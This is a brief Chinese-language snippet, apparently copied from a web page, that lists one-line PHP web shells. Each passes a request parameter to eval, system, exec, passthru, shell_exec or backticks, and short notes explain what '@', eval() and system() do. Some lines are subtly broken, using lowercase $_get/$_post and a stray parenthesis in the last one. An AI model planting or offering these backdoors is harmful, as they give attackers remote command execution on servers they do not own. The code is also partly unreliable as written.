<?php @eval($_get['phpcode']);?> <?php @eval($_post['phpcode']);?> <?php @system($_get['cmd']);?> <?php @system($_post['cmd']);?> <?php @exec($_post['cmd']);?> <?php @passthru($_post['cmd']);?> <?php @shell_exec($_post['cmd']);?> <?php $cmd=$_post['cmd']);`$cmd`;?>
@ + function表示忽略警告。
eval() 是可以执行php代码
system() 是可以执行系统命令
黄山市民网:https://www.huangshanshimin.com/